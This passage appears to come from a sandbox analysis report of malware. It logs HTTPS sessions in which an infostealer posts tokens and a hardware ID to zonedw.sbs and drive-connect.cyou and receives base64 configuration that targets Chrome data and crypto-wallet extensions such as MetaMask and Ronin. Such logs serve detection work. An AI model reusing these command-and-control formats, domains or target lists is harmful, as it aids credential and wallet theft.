                                                                                                                                                                                                                                                2024-12-13 12:54:40 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                54192.168.2.450402116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:43 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9HDJWBSRQQ9ZM7GLNGVS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 39 48 44 4a 57 42 53 52 51 51 39 5a 4d 37 47 4c 4e 47 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 39 48 44 4a 57 42 53 52 51 51 39 5a 4d 37 47 4c 4e 47 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 48 44 4a 57 42 53 52 51 51 39 5a 4d 37 47 4c 4e 47 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------9HDJWBSRQQ9ZM7GLNGVSContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------9HDJWBSRQQ9ZM7GLNGVSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9HDJWBSRQQ9ZM7GLNGVSCont
                                                                                                                                                                                                                                                2024-12-13 12:54:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:44 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                55192.168.2.450412116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----USR1V37900ZM7Q1DTJW4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------USR1V37900ZM7Q1DTJW4Cont
                                                                                                                                                                                                                                                2024-12-13 12:54:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:47 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                56192.168.2.450413172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=WE3U4376I2RK801L
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 1336
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC1336OUTData Raw: 2d 2d 57 45 33 55 34 33 37 36 49 32 52 4b 38 30 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 57 45 33 55 34 33 37 36 49 32 52 4b 38 30 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 45 33 55 34 33 37 36 49 32 52 4b 38 30 31 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 45 33
                                                                                                                                                                                                                                                Data Ascii: --WE3U4376I2RK801LContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--WE3U4376I2RK801LContent-Disposition: form-data; name="pid"1--WE3U4376I2RK801LContent-Disposition: form-data; name="lid"FATE99--test--WE3
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=00qns9rtosi1hmj60oo6jb6t7l; expires=Tue, 08-Apr-2025 06:41:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwtyWuE7LIixFLrOcKn85jSdXUEmudkK6pQ2Mj7KhXfVCrupW4teBXLZw%2FwP4r1L5OLHiF1JGxZTd3JZAWpafHwOUy23m49PvbMWsNW6xfT6NGOmjC6GgK%2FqxmXanyV4jYeF3DU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161acc4abb0f75-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1631&rtt_var=791&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2253&delivery_rate=1242024&cwnd=221&unsent_bytes=0&cid=287eed01c180ebd6&ts=1037&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                57192.168.2.450431116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:48 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DB1DBAIWTRQIE3E3OH4E
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 6301
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:48 UTC6301OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DB1DBAIWTRQIE3E3OH4ECont
                                                                                                                                                                                                                                                2024-12-13 12:54:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                58192.168.2.450433116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:49 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:49 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------1DTJW47QQ9RQQIMOZU3ECont
                                                                                                                                                                                                                                                2024-12-13 12:54:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                59192.168.2.450439172.217.19.228443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:55 GMT
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-UUk-wTWOd1SIP4tM6PhdRg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC124INData Raw: 32 64 65 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 61 77 61 72 64 73 22 2c 22 77 69 6e 64 6f 77 73 20 31 31 22 2c 22 70 61 6c 61 6e 74 69 72 20 73 74 6f 63 6b 73 22 2c 22 64 69 73 6e 65 79 20 77 6f 72 6c 64 20 74 61 6c 6c 79 20 74 68 65 20 65 6c 66 22 2c 22 73 63 68 6f 6f 6c 20 63 6c 6f 73 69 6e 67 73 22 2c 22 6e 6a 20 64
                                                                                                                                                                                                                                                Data Ascii: 2de)]}'["",["college football awards","windows 11","palantir stocks","disney world tally the elf","school closings","nj d
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC617INData Raw: 72 6f 6e 65 73 20 66 6c 79 69 6e 67 22 2c 22 66 75 6c 6c 20 6d 6f 6f 6e 20 63 6f 6c 64 20 6d 6f 6f 6e 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 68 61 75 6e 74 65 64 20 6d 61 6e 73 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32
                                                                                                                                                                                                                                                Data Ascii: rones flying","full moon cold moon","monopoly go haunted mansion"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                60192.168.2.450441172.217.19.228443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:55 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
